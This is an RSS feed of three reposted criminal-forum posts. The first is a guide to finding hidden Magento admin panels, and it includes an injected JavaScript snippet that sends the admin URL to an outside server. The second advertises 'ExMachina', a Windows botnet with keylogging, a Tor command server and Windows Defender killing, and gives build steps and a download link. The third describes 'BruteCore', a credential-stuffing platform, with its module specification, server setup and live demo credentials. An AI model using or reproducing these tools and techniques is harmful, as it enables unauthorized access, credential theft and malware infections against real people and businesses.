<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@blackhunt</title><generator>teletype.in</generator><description><![CDATA[@blackhunt]]></description><link>https://teletype.in/@blackhunt?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/blackhunt?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/blackhunt?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Wed, 13 May 2026 02:32:29 GMT</pubDate><lastBuildDate>Wed, 13 May 2026 02:32:29 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@blackhunt/Magento</guid><link>https://teletype.in/@blackhunt/Magento?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt</link><comments>https://teletype.in/@blackhunt/Magento?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt#comments</comments><dc:creator>blackhunt</dc:creator><title>Finding the path to the Magento admin panel </title><pubDate>Mon, 19 Feb 2024 04:20:52 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/78/7e/787e62da-b338-43df-9aa2-87c1131bd628.png"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/02/36/02360378-e48b-4f0c-a194-87dbdc40db79.png"></img>With enviable regularity, I see more and more new topics on finding a way to the Magenta admin panel, so I will collect everything that I have seen before on this forum.]]></description><content:encoded><![CDATA[
  <p id="iZcX">With enviable regularity, I see more and more new topics on finding a way to the Magenta admin panel, so I will collect everything that I have seen before on this forum. </p>
  <p id="8jgg"> 1. One of the default paths if the admin <em> has special needs </em> (thanks <strong> kingdomecome </strong> #comment-1099896)</p>
  <pre id="lPLL">httpx://{base_url}/catalog/Adminhtml_category </pre>
  <p id="CWqt">2. If it is possible to read files on the host, read this file (thanks to <strong> secnull </strong> #comment-1099846)</p>
  <pre id="YCd5">/app/etc/local.xml </pre>
  <p id="1gvq">2.1 As an addition to the previous paragraph (thanks to <strong> fout </strong> #comment-1299309)</p>
  <pre id="RdaK">The admin panel name is set in the config usually app/etc/local.xml or app/etc/env.php

 in the line &#x27;backend&#x27; =&gt; &#x27;frontName&#x27; =&gt; &#x27;[frontName]&#x27;

 Admin access: http://hostname/index.php/[frontName]/ </pre>
  <p id="PJKE">tells us <strong>3. And here is what the user winstrool </strong> , thanks to him for this (#comment-1100049)</p>
  <pre id="AGXB">try looking at the paths:
 /rss/catalog/notifystock/
 index.php/rss/catalog/notifystock/

 If rss is enabled, then a basic authorization will pop up there, the login pass is the same as from the admin panel, you go through authorization, there you look at the source code of the page, the path to the admin panel will be written in it </pre>
  <p id="VTLH">4. If the administrator of the resource is a radish (a bad person) and changed the path to the admin area to a custom one, it makes sense to look in the database. <br /> From personal experience, I have written down the following search anchors:</p>
  <pre id="fALi">core_config
-T core_config_data --where=&quot;path=&#x27;admin/url/use_custom&#x27;&quot; -C value

и
cms_page </pre>
  <p id="uLO1">5. In any case, it is worth checking this path, which I have repeatedly mentioned on the forum pages:</p>
  <pre id="c21t">/downloader

 We look for the inscription return to admin and go to the authorization page </pre>
  <p id="9nME">6. I didn’t check it myself, but there was this information on the forum (thanks to <strong> gcclub </strong> #comment-814214)</p>
  <pre id="Q0la">There is an admin notification inbox table in Magento (something like this)
 there in it the read notice of the hectic zhs

 var xhr = new XMLHttpRequest();
 xhr.open(&quot;POST&quot;, &quot;http://server&quot;, true);
 xhr.setRequestHeader(&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded; charset=UTF-8&quot;);
 xhr.send(window.location.href);

 this post request code will send the full admin URL </pre>
  <p id="axzJ">7. There was this topic ( <strong> /topic/126409/ </strong> ) from which we can learn a lot of useful things if we read letters with our eyes and think thoughts with our brains (thanks to <strong> 0M0H </strong> for starting the thread):</p>
  <pre id="RX0j">basic moments:
 1. Searching /admin, /manager, /backend, /office
 3. /index.php/rss/order/new/, we go through authorization using HTTP Basic Auth, after which we click on the order link, cookies are set, you will be in the admin panel, and even logged in, it happens that the xml is not readable in the link text view, extract the url from the “href” of the “a” tag yourself </pre>
  <p id="vfnN">And this is what the path to the admin panel looks like during the installation of Magenta:</p>
  <figure id="ckQy" class="m_original">
    <img src="https://img1.teletype.in/files/02/36/02360378-e48b-4f0c-a194-87dbdc40db79.png" width="961" />
  </figure>
  <p id="fCEA">You can try to bruteforce, hehe, there are no options at all - 36^6, EMNIP. </p>
  <p id="ki50"> That&#x27;s all in my notes, perhaps something has escaped my attention. <br /> If the moderators deem it necessary, please pin this topic to make it easier to find information.</p>
  <p id="FP7o"><strong>Author: FHT</strong><br /><strong>Source :</strong> <a href="https://forum.exploit.in/topic/225568/" target="_blank">https://forum.exploit.in/topic/225568/</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@blackhunt/ExMachina</guid><link>https://teletype.in/@blackhunt/ExMachina?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt</link><comments>https://teletype.in/@blackhunt/ExMachina?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt#comments</comments><dc:creator>blackhunt</dc:creator><title> ExMachina - Botnet for Windows </title><pubDate>Wed, 14 Feb 2024 06:37:00 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/cd/91/cd91c16c-756d-459b-8aef-1c48d04c5c46.png"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/c4/5d/c45db3b1-00c3-409b-bf89-50f01586e984.png"></img>Hello friends, we present ExMachina - a botnet for Windows. The client is written in the Golang programming language, and the control server is written in Python using the Flask web framework. , which uses the Tor network to communicate with bots.]]></description><content:encoded><![CDATA[
  <p id="OEhA">Hello friends, we present ExMachina - a botnet for Windows. The client is written in the Golang programming language, and the control server is written in Python using the Flask web framework. , which uses the Tor network to communicate with bots.</p>
  <figure id="rHGm" class="m_original">
    <img src="https://img1.teletype.in/files/c4/5d/c45db3b1-00c3-409b-bf89-50f01586e984.png" width="1920" />
  </figure>
  <p id="ZezY">Functions: <br /> - Anonymous C2C server thanks to the Tor network <br /> - Listen to user keyboard input <br /> - taking screenshots <br /> - Run PowerShell commands <br /> - try killing Windows Defender processes<br /></p>
  <figure id="EJdj" class="m_original">
    <img src="https://img1.teletype.in/files/4e/a5/4ea597d8-fb46-48f6-ae61-195372329d81.png" width="1366" />
  </figure>
  <figure id="XZei" class="m_original">
    <img src="https://img4.teletype.in/files/7a/17/7a17a031-5732-4ace-86b6-c4d71fa665e6.png" width="1366" />
  </figure>
  <figure id="GhXR" class="m_original">
    <img src="https://img1.teletype.in/files/8b/c9/8bc9cd24-bfe7-4148-87c5-bae71291007d.png" width="1088" />
  </figure>
  <p id="uSaW">Notes that this project is not yet complete as more testing is required to bypass all existing antiviruses, so the to-do list is improving the code so that it bypasses all possible antiviruses and adding a function to run encrypted shellcode. <br /> for the hardware you need a server for at least 4GB of ram and 2cpu cores, as for the software: Tor, nginx(optional), python, and Go <br /> use: <br /> set up a hidden tor server <br /> encode the entire onionv3 address, Discord webhook and executable name because it will try to delete itself <br /> edit main.go adding new Base64 encoded data</p>
  <p id="kUz6">Bash:</p>
  <pre data-lang="bash" id="HapR">cd ExMachina
GOOS=windows go build -ldflags=&quot;-w -s -H=windowsgui&quot;</pre>
  <p id="Cyil">the output executable is about 6.5 MB <br /> start the server by running python wsgi.py(for debugging and testing python test.py), register admin (default admin username is &quot;ErenYeager&quot;, you can change it if you want) go to /register route and register admin password <br /> enjoy</p>
  <p id="RtVj"><a href="https://send.exploit.in/download/59d81dee7efd1cfa/#JSeoavfgjRanR0xx0mOllg" target="_blank">https://send.exploit.in/download/59d81dee7efd1cfa/#JSeoavfgjRanR0xx0mOllg</a><br /></p>
  <p id="0oaS">author : <a href="https://xss.is/members/326294/" target="_blank">https://xss.is/members/326294/</a></p>
  <p id="bABK">source : xss.is</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@blackhunt/56XHJICdnGr</guid><link>https://teletype.in/@blackhunt/56XHJICdnGr?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt</link><comments>https://teletype.in/@blackhunt/56XHJICdnGr?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=blackhunt#comments</comments><dc:creator>blackhunt</dc:creator><title>BruteCore - Universal Brute/Checker</title><pubDate>Wed, 07 Feb 2024 08:29:06 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/8a/54/8a54bdd2-616f-4a03-834d-77da31eb1cf5.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/19/b0/19b0857e-90b2-40a8-9b79-d6faafb53b9e.png"></img>Introduction When I first saw that a new competition was announced for the CSU, I immediately decided that I would participate. However, the question arose as to which project would be best to enter the competition with. I spent a long time choosing between writing a messenger to replace Tox with detected RCE, or writing a brute, of which I wrote a whole bunch and a cart in Delphi. But I realized that if I started making a messenger, I definitely wouldn’t have time, and I also have quite extensive experience in writing brute-forces/checkers. I wrote them for every taste and color, analyzed mobile applications, and understood encryption on various sites. Taking into account all these aspects, I understood what I would do. But the...]]></description><content:encoded><![CDATA[
  <figure id="KdDU" class="m_original">
    <img src="https://img2.teletype.in/files/19/b0/19b0857e-90b2-40a8-9b79-d6faafb53b9e.png" width="980" />
  </figure>
  <p id="JMlh"><u><strong>Introduction </strong> </u><br /> When I first saw that a new competition was announced for the CSU, I immediately decided that I would participate. However, the question arose as to which project would be best to enter the competition with. I spent a long time choosing between writing a messenger to replace Tox with detected RCE, or writing a brute, of which I wrote a whole bunch and a cart in Delphi. But I realized that if I started making a messenger, I definitely wouldn’t have time, and I also have quite extensive experience in writing brute-forces/checkers. I wrote them for every taste and color, analyzed mobile applications, and understood encryption on various sites. Taking into account all these aspects, I understood what I would do. But the question was different, the brute must be truly unique, and not just another brute for one site with loading of the database and proxies. </p>
  <p id="LILO"> <strong>Advantages: </strong> <br />  <em>1. Everything in one place </em><br />When you often write brutes, you end up with a whole bunch of stuff - compiled brutes with results, source codes. It&#x27;s all scattered across different folders and is somehow inconvenient. And if you add some other feature to this, you have to go into each software, add it and compile it, which takes a lot of time. <br /> <em>2. Modern stack </em><br />Brutes are usually written in Delphi or C#, but these languages ​​are already a little outdated for this task. Or they write brutes using OpenBullet or Private Keeper, and there were a whole bunch of them, but the rest somehow didn’t catch on much. I chose Golang for its outstanding performance under high loads and efficient multithreading. It may not be the same OOP language, but it&#x27;s great for the purpose. <br /> <em>3. Cross-platform </em><br />Most Brutes are created for Windows for the convenience of the end user. But using Golang allows you to compile it for different operating systems without problems. So, in addition to Windows, we can easily work on Linux servers, which adds flexibility and versatility. <br /> <em>4. Web-face instead of GUI </em><br />Those who brute usually use dedicated Windows servers, managing them via RDP. It&#x27;s expensive and not always convenient. Working with Brute as a website is much more convenient. You open a tab in the browser and work there. <br /> <em>5. Saving all settings to presets </em><br />In order not to enter the settings again each time, I implemented presets. Specify the source of the proxy, their type, and then you simply select this preset. The remainder is also saved, the results can be downloaded in txt or xlsx format. Also, if the brute force was stopped for any reason, it can be restarted and there is no need to take the rest, stuff it in a new one and register all the settings again, which, in my opinion, is also very convenient. <br /> <em>6. No kernel restrictions for developers </em> <br />Universal Brutes impose certain restrictions on project developers. My module is a microservice with one endpoint, and it can be written in any compiled language. Input data into it, it performs its magic and says good, bad, error and so on. No kernel restrictions for developers. </p>
  <p id="O5Ui"> <u><strong>Instructions for use </strong></u><br /> The algorithm for using the program is approximately the following:</p>
  <ol id="vu6L">
    <li id="QWH3">Loading the bazooka</li>
    <li id="HuzP">Create a new proxy preset</li>
    <li id="LzLS">Load the module</li>
    <li id="fz9z">Create a session, select what you created above and then start.</li>
  </ol>
  <p id="9p4p">Now let&#x27;s go over each point in more detail.<br /><strong>Combo sheets </strong></p>
  <figure id="d2Sj" class="m_original">
    <img src="https://img4.teletype.in/files/70/52/70526492-04c1-49f9-9c80-6c91f76dd27d.png" width="2146" />
  </figure>
  <p id="kijY">To make storing databases easier, I added the ability to create folders and group databases within them. Considering that there can be many databases and on different topics, this will make navigation easier. Just right-click on an empty space and select &quot;Create Folder&quot; or &quot;Create Combo List&quot;. </p>
  <p id="kh4F"> To create a folder, just enter the name of the folder in the modal window that appears after clicking the right mouse button. </p>
  <p id="qhoo">The combo sheet works a little differently. It allows you to combine multiple files or links to form one common list. For example, you can specify a file on the server and a link to Sendspace, where the database is also stored, and get one combo sheet with data from several sources. You can also provide one link or file, depending on your convenience. When creating a combo sheet, you need to specify the type of data that will be included in it.</p>
  <figure id="PqYa" class="m_original">
    <img src="https://img4.teletype.in/files/f5/5c/f55cadd2-7c5f-4896-8956-03b4dbfb9a03.png" width="1149" />
  </figure>
  <p id="umLx">For now, you can currently only provide direct links to files, which is really convenient if your databases are stored in the cloud. The second option is loading databases from a file that is located on the same machine where the software is running. I have not yet made it possible to select a file from the car where the user is sitting. I decided not to enable this feature for now because I know that some users download huge databases with several million rows and leave it overnight. It would be quite difficult to load such large databases here, so I decided to postpone this function for later. However, if you run the software on the same machine where you are, then specifying the path to the file does not pose a problem.<br /></p>
  <figure id="AVWJ" class="m_original">
    <img src="https://img3.teletype.in/files/69/e9/69e9aef7-9790-474c-a1d4-3e6ad45394dd.png" width="1578" />
  </figure>
  <p id="90af">If you want to delete a folder, you must first delete its nested items. If you want to delete a combo sheet, there should not be any sessions associated with it. If there is a cloud on the FO, the software will not bypass it, so make sure that there is no cloudflare on the resource where the bazka is uploaded.</p>
  <p id="hMOe"><strong>Proxy presets </strong></p>
  <figure id="SgXi" class="m_original">
    <img src="https://img3.teletype.in/files/e1/3d/e13da29d-9aff-4350-9204-f160cfcdc5c7.png" width="1524" />
  </figure>
  <p id="pdD6">Here it looks something like this; in fact, it has a certain similarity with combo sheets, only here I didn’t make folders. As a rule, proxies are loaded either from a file, different each time, or via the API link of various services such as advances, bests or ABM, generally according to taste and color... and there they are updated in real time with some frequency. There have also been cases when proxies are written to a file on disk and updated from it with a certain frequency in the brute force. In this regard, it is convenient to use presets. In case this is a one-time download from a file in which the proxies will quickly die, then you can not create a preset, but immediately load the proxy in the session, for this there is a separate button in the sessions, select it and load your file from the disk there.</p>
  <p id="5Xcv">But let&#x27;s get back to the presets.</p>
  <figure id="iNC0" class="m_original">
    <img src="https://img3.teletype.in/files/24/39/2439dcba-3b56-4cfa-aae5-6aa9a9fdacb6.png" width="1017" />
  </figure>
  <p id="Vzti">When using a preset to load a proxy from a link or from a file on disk, you specify the name of the preset. If the proxies will be updated at a certain frequency, you check the box next to the interval and specify the time in seconds. <br /> The website connection timeout for a proxy is meant as usual; this is the time it takes to wait for a response from the server when connecting to it. <br />As with combo lists, you can specify multiple sources from which proxies will be taken. If the file is on your car, then proxy auto-update will not work for it, and the program will always take data from the file you downloaded. This is quite logical. <br />Auto-update will be active for deleted files and links. You can choose several proxy types: HTTP/S, SOCKS4, SOCKS5. This means that several different types of proxies can be used at once in one brute session. This is convenient because you can specify several links with different types of proxies, and the program will use them all together.</p>
  <p id="U7j6"><strong>Modules <br /></strong></p>
  <figure id="s41g" class="m_original">
    <img src="https://img4.teletype.in/files/3a/9c/3a9c6d49-4f4b-4134-88ac-a14a98d7d71c.png" width="2155" />
  </figure>
  <p id="25q6">Actually, the tab itself is very simple, you click add, load the module file and it pulls it into this tab. But how to make the modules themselves is a different story. <br />A module is an independent microservice with its own writing specification. Although the module can be written in any programming language, I would still recommend using Go because it compiles into a single executable and is easy to run on any platform. However, it should be remembered that if your BruteCore is running on Linux, then the module must also be compiled for Linux, and similarly for Windows. <br /> When you load a module, it is run with the &quot;-getinfo&quot; option and the module should return JSON in the following format:</p>
  <pre data-lang="json" id="lNzn">{
    &quot;name&quot;: &quot;TestModule&quot;, 
    &quot;version&quot;: &quot;1.0.0.0&quot;,
    &quot;author&quot;: &quot;0xUser&quot;,
    &quot;data_type&quot;: 9
}</pre>
  <p id="6EJK">The &quot;data_type&quot; field determines the data type of the combo sheet that the module works with. Here are the possible values:</p>
  <pre data-lang="" id="Czds">4   DATA_TYPE EMAIL
5   DATA_TYPE USERNAME
6   DATA_TYPE PASSWORD
7   DATA_TYPE PIN
8   DATA_TYPE USERNAME:PASSWORD
9   DATA_TYPE EMAIL:PASSWORD
10  DATA_TYPE DATA</pre>
  <p id="vVys">All of the above types can be found in the reference table in the database, which lies next to the project. If any field from the above json format is not in the module, BruteCore will set the value to none, as in the picture above in the “Version” field. The modules themselves are saved in the modules folder next to the software. <br /> If any field from the above JSON is missing from the module, BruteCore will set its value to &quot;none&quot;. <br /> Modules are saved in the &quot;modules&quot; folder next to the program. <br /> When running a module for brute force, it is called with the &quot;-port&quot; argument indicating the port on which the microservice should be run. <br /> The module must have a POST endpoint &quot;/ExecuteModule&quot; that accepts JSON in the following format:</p>
  <pre data-lang="json" id="vInr">{
  &quot;email&quot;: &quot;0xUser@0xuser.cf&quot;,
  &quot;username&quot;: &quot;0xUser&quot;,
  &quot;password&quot;: &quot;xss.password&quot;,
  &quot;pin&quot;: &quot;1234&quot;,
  &quot;data&quot;: &quot;example_data&quot;,
  &quot;timeout&quot;: 15000,
  &quot;proxy_host&quot;: &quot;127.0.0.1&quot;,
  &quot;proxy_port&quot;: 8080,
  &quot;proxy_type&quot;: 18
}</pre>
  <p id="k2E9">Almost all fields are optional. Almost all fields are optional, some of them may be missing, for example, if the brute force goes without a proxy, then there will be no corresponding fields in json; if type 9 of the combo list was selected, then the email and password fields will be present and, accordingly, for different types of combo list . The service performs certain actions with the data and returns JSON of the following form:</p>
  <pre data-lang="json" id="FGhe">{
  &quot;status&quot;: 25,
  &quot;log&quot;: &quot;proxy: 127.0.0.1:8080 \n some additional data in log&quot;
}</pre>
  <p id="K2yR">The log field is optional and can, in principle, be absent if you do not need it. The status can have the following meanings:</p>
  <pre data-lang="" id="Ddgs">25  RESULT  Хорошие
26  RESULT  Плохие
27  RESULT  Ошибки Соединения
28  RESULT  Ошибки ПО
29  RESULT  Капча
30  RESULT  С балансом
31  RESULT  Пустышки
32    RESULT    Зарегестрирован
33    RESULT    Залимиченные</pre>
  <p id="uT9e">In theory, all the main work is done by modules, BrutCore itself acts as a kind of orchestrator that launches the required service, maintains it in working order, sends input data to it, then modular magic happens, “special physical and mathematical calculations” as a result of which we and we’ll find out whether it’s bad or something else. <br />IMPORTANT!! Since we are already working with compiled modules, there may be all sorts of “bookmarks”, because here there are absolutely no restrictions for the developer in terms of what code to write, what libraries to use, etc., so you should be very careful and use only trusted modules people, or write modules yourself. God protects the careful! <br /> Below in the article you can find an example of a ready-made module and use it as a template for writing your own modules.</p>
  <p id="Bhio"><strong>Sessions </strong></p>
  <figure id="tF8c" class="m_original">
    <img src="https://img2.teletype.in/files/9c/a4/9ca42bba-cde2-4513-bf2b-393fe21b28c7.png" width="2161" />
  </figure>
  <p id="p03X">In sessions everything is relatively simple, you create a new session using the add button, then click on the arrow on the right and go to the details of a specific session.</p>
  <figure id="3EBC" class="m_original">
    <img src="https://img1.teletype.in/files/c8/80/c880d357-2f37-445a-a4a3-41fecf206d73.png" width="2131" />
  </figure>
  <p id="MlTE">Select the combo list that you want to brute, after which you can select a proxy either from a ready-made preset, or download it from a file that is on the car you are connecting with. If you want to brute without a proxy, then you don’t select anything and the brute will go without a proxy. Select the module, enter the number of threads you need and launch it. </p>
  <p id="KzsA">It is generally not advisable to change the proxy list, combo sheet or module during the search. But you can change the number of threads while working; the software will automatically pick up the number of threads and, if necessary, get rid of unnecessary ones, or create new ones that do not remain. To get statistics on the brute, you need to click on the update button to the right of the word statistics, but perhaps this is not convenient, maybe you should have made it update the statistics via websockets, well, I don’t want to put an additional load on the software. The results can be viewed accordingly by clicking on the results button, the next view will open.</p>
  <figure id="iHI1" class="m_original">
    <img src="https://img3.teletype.in/files/e3/a7/e3a7b003-148b-46c4-8a14-407efb97b2c6.png" width="2167" />
  </figure>
  <p id="JB2s">Actually, here is the usual pagination based on the results, choose what you want to see, how many records should be displayed at once, and then look. </p>
  <p id="pPoj">The result can be downloaded in other formats, either txt or xlsx, I think anyone who has worked with Excel will definitely check it out. If there were any logs from the beeps, they will be in the right column with the log. It depends on the project you are launching. <br /> <u><strong> Instructions for use </strong></u> </p>
  <p id="a4dU"> Install Node.js from the official website <a href="https://nodejs.org/en/download" target="_blank"> https://nodejs.org/en/download </a> . <br /> Install Vue-cli with the command npm install -g @vue/cli. <br /> Install Golang from the official website <a href="https://go.dev/doc/install" target="_blank"> https://go.dev/doc/install </a> . <br /> Download the source code for the frontend and backend. <br /> In the folder with the front, run npm i in the folder with the back go mod tidy and go mod vendor. <br /> If you plan to run BruteCore locally on your car, then you need to do the following:</p>
  <ol id="xlFD">
    <li id="82Vg">In the front folder, run the command npm run serve</li>
    <li id="Cbcv">In the backing folder, run the go run command.</li>
    <li id="5Qtd">Go to localhost:8080 in your browser</li>
    <li id="zNBB">done</li>
  </ol>
  <p id="U7tF">If you run BruteCore on the server, you need to do the following:</p>
  <ol id="SDP7">
    <li id="D5Hx">In the folder with the front, in the file src\main.js, on line 12, change <a href="http://127.0.0.1:985" target="_blank"> http://127.0.0.1:985 </a> to your domain or server address (for example: <a href="http://0xuser.cf" target="_blank"> http://0xuser.cf </a> , <a href="http://255.255.255.255" target="_blank"> http://255.255.255.255 </a> )</li>
    <li id="R5m1">In the folder with the front, run npm run build, the view will collect all the sources and a dist folder will be created, which will contain everything necessary for the front.</li>
    <li id="17li">In the folder with the backend source, in the “.env” file we change the values ​​of AUTH_ADMIN_LOGIN, AUTH_ADMIN_PASSWORD, AUTH_VIEWER_LOGIN, AUTH_VIEWER_PASSWORD, JWT_KEY to our own, we also need to change the value of JWT_KEY to any string, this is the key with which jwt tokens will be encrypted on the server.</li>
    <li id="xL8s">In the backing folder we set the environment variables “set goos=linux, set goarch=amd64”, if your server has some other architecture, then indicate your architecture.</li>
    <li id="ggyY">We assemble the backing with the command “go build main.go”</li>
  </ol>
  <p id="faaa">As a result, we have a dist folder with a front and an executable file for Linux with a backend. Now we go to our server and update the packages available on it to the latest version with the commands: <br /> <code>sudo apt update</code><br /> <code>sudo apt upgrade</code><br /> We roll up nginx with the command: <br /> <code>sudo apt nginx</code><br /> Copy the contents of the dist folder to the /var/www/front.brutecore folder <br /> Copy the compiled main, .env, BruteCore.sqlite to the /var/www/back.bruteforce folder <br /> Afterwards we run the command <code>chmod +x main</code><br /> In the /etc/nginx/sites-available folder, create a brutecore file with the following contents, where server_name localhost, “localhost” is changed to your domain or server address:</p>
  <pre data-lang="nginx" id="s8b0">server {
    listen      80;
    server_name localhost;
    charset utf-8;
    root    /var/www/front.brutecore;
    index   index.html;

    #Always serve index.html for any request
    location /Health { 
        proxy_pass http://127.0.0.1:985/Health;
    }

    location /api {
        proxy_pass http://127.0.0.1:985/api;
    }   

    location / {
        root /var/www/front.brutecore;
        try_files $uri  /index.html;
    }

    error_log  /var/log/nginx/vue-app-error.log;
    access_log /var/log/nginx/vue-app-access.log;
}</pre>
  <p id="Hmx4">Next we run the command: <br /> <code>sudo ln -s /etc/nginx/sites-available/brutecore /etc/nginx/sites-enabled/</code><br /> We also edit the /etc/nginx/nginx.conf file <br /> We find these lines and uncomment them</p>
  <figure id="FAiq" class="m_original">
    <img src="https://img4.teletype.in/files/36/d2/36d29085-30bc-46fa-a18f-2f8d3d8d851c.png" width="1213" />
  </figure>
  <p id="rCvh">We also need to add the line next to it: <code>client_max_body_size 20M;</code><br /> This is necessary for nginx to compress styles and other scripts, and also so that we can upload modules to the server without any problems. </p>
  <p id="hhIO"> Restart nginx with the command: <code>sudo systemctl restart nginx</code><br /> Then we launch the backend with Komagda <code>sudo nohup ./main &amp;</code>, and go in the browser to the address of our server or domain. If everything was done correctly, the login window should appear and we can log in without any problems. <br />If after logging into your Account you receive the error “failed to initialize database, got error Binary was compiled with &#x27;CGO_ENABLED=0&#x27;, go-sqlite3 requires cgo to work. “This is a stub” then you need to install goshka on the server, then install the gcc/g++ compiler there with the command <code>sudo apt-get install build-essential</code>and then build the application on the server and it will work. </p>
  <p id="RUzL"> All sources can be downloaded from the link <a href="https://www.sendspace.com/file/2ujpbd" target="_blank"> https://www.sendspace.com/file/2ujpbd </a><br /> I specially deployed the demo so that you could see what it looks like already deployed <a href="http://45.83.122.198/" target="_blank"> http://45.83.122.198/ </a> Login XSSViewer, Password: xss.is1pass</p>
  <p id="Mysq">author : <a href="https://xss.is/members/235163/" target="_blank">0xUser </a></p>
  <p id="ElZw">source xss : /threads/107438/</p>
  <p id="reEx">Enjoy !<br /><br />@Bl4nk_Room</p>

]]></content:encoded></item></channel></rss>